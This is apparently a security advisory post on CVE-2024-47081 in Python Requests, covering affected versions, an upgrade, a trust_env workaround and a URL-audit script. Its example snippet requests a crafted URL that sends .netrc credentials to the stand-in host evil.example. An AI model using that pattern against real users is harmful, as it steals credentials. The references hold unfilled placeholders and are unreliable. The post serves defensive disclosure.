Summary:
A severe vulnerability—CVE-2024-47081—affecting the popular Python Requests HTTP library has been discovered. Anyone using Requests versions *before* 2.32.4 could unknowingly leak sensitive .netrc credentials to third parties, putting accounts and infrastructure at serious risk. This post will break down how the bug works, what code is vulnerable, and precise steps you must take to safeguard your credentials.
What is the Requests Library?
If you’re using Python for web scraping, APIs, or microservices, you probably rely on Requests, a user-friendly HTTP client package. It's widely adopted for its simplicity:
import requests
response = requests.get('https://example.com')
print(response.text)
Requests can automatically use .netrc files for authentication—a file that stores usernames and passwords for various remote destinations.
The Vulnerability: CVE-2024-47081 Explained
What’s wrong?
A *URL parsing bug* means crafted URLs can trick Requests into sending your .netrc credentials to attackers, instead of the intended server.
How? By using tricky URL formats, a malicious site could get credentials for a host you trust (api.goodsite.com), just by getting you to access something like:
https://api.goodsite.com@evil.example/path
Here, Requests might extract .netrc credentials intended for api.goodsite.com, but send them to evil.example. That’s devastating if those credentials unlock sensitive resources.
Affected versions: Requests 2.32.3 and earlier (every release before 2.32.4).
Let’s see what a vulnerable piece of code could look like:
import requests
# Imagine .netrc has credentials for 'api.goodsite.com'
url = "https://api.goodsite.com@evil.example/callback"
resp = requests.get(url)
If you’re running this on Requests 2.32.3 or earlier, and you have credentials for api.goodsite.com in your .netrc file, your credentials will be sent over the wire to evil.example.
Why Is This So Dangerous?
- .netrc files often store credentials for critical internal APIs, cloud endpoints, or version control servers.
- The attack just needs you to request a maliciously formatted URL (could be via redirects, links, or third-party scripts).
- Credentials might be tokens or passwords that grant API/root access.
Solution:
1. Upgrade Requests Immediately
Install version 2.32.4 or later.
pip install --upgrade requests
# Confirm the version
python -c "import requests; print(requests.__version__)"
- Requests 2.32.4 release notes
2. If you CAN’T upgrade right away, use this workaround:
import requests
session = requests.Session()
session.trust_env = False  # stops Requests from loading .netrc credentials automatically
response = session.get("https://api.goodsite.com@evil.example/callback")
Note: trust_env=False disables ALL use of .netrc. It also stops Requests reading proxy settings and CA bundle paths from environment variables (HTTP_PROXY, HTTPS_PROXY, NO_PROXY, REQUESTS_CA_BUNDLE), so scripts that depend on any of those must pass them explicitly.
Further Reading and References
- Official CVE Record: CVE-2024-47081
- Requests GitHub Security Advisory *(replace with actual link when available)*
- Commit fixing the bug *(replace with actual commit hash)*
- Upgrade: If you use Requests, get to 2.32.4+ ASAP.
- Audit URLs: Sanitize untrusted URLs and never let third parties control hostnames/URLs to which you send credentials.
- Disable .netrc: If you can't upgrade, set trust_env=False in your Sessions as a temporary measure.
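The "Audit URLs" step above, as an added example that is not code from the Requests project or from this post: it uses only the standard library, refuses any URL whose authority carries userinfo (the shape of the crafted URL shown earlier), enforces https and a hypothetical allow-list `TRUSTED_HOSTS`, and can be run over every hop of a redirect chain, since the attack can also arrive via redirects.

```python
"""Pre-flight URL audit before a request that may carry .netrc credentials.
Added example (not Requests project code); standard library only."""
from urllib.parse import urlsplit

# Hypothetical allow-list: the hosts this deployment keeps .netrc entries for.
TRUSTED_HOSTS = {"api.goodsite.com"}

def audit_url(url, trusted_hosts=TRUSTED_HOSTS):
    """Return (ok, detail): ok is False when the URL must not be sent with
    credentials; detail is the normalised host on success, else the reason."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False, f"scheme {parts.scheme!r} is not https"
    # Anything before '@' in the authority is userinfo, not the destination;
    # .hostname shows where the connection would really go.
    if "@" in parts.netloc:
        return False, (f"authority {parts.netloc!r} embeds userinfo; "
                       f"real destination is {parts.hostname!r}")
    host = (parts.hostname or "").rstrip(".")  # .hostname is already lower-case
    if not host:
        return False, "URL has no host"
    if host not in trusted_hosts:
        return False, f"host {host!r} is not on the .netrc allow-list"
    return True, host

def audit_chain(urls, trusted_hosts=TRUSTED_HOSTS):
    """Audit every hop of a redirect chain (start URL plus each Location
    target, e.g. the URLs in a Requests response.history); stops at the first
    rejection so a redirect cannot quietly move credentials to another host."""
    result = (False, "empty chain")
    for url in urls:
        result = audit_url(url, trusted_hosts)
        if not result[0]:
            break
    return result

if __name__ == "__main__":
    # Constructed sample URLs, including the crafted shape from the post.
    for sample in ("https://api.goodsite.com/v1/items",
                   "https://api.goodsite.com@evil.example/callback",
                   "http://api.goodsite.com/v1/items"):
        ok, detail = audit_url(sample)
        print("ALLOW" if ok else "BLOCK", sample, "->", detail)
```

Run the audit before the first request and again over `response.history` (or in a `response` hook) so a redirect chain is checked hop by hop.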
This vulnerability is serious and much easier to exploit than most people realize. If you rely on Python Requests in production systems—or even for local automation—take action now to avoid leaking private credentials.
Timeline
Published on: 06/09/2025 18:15:24 UTC
Last modified on: 06/12/2025 16:06:47 UTC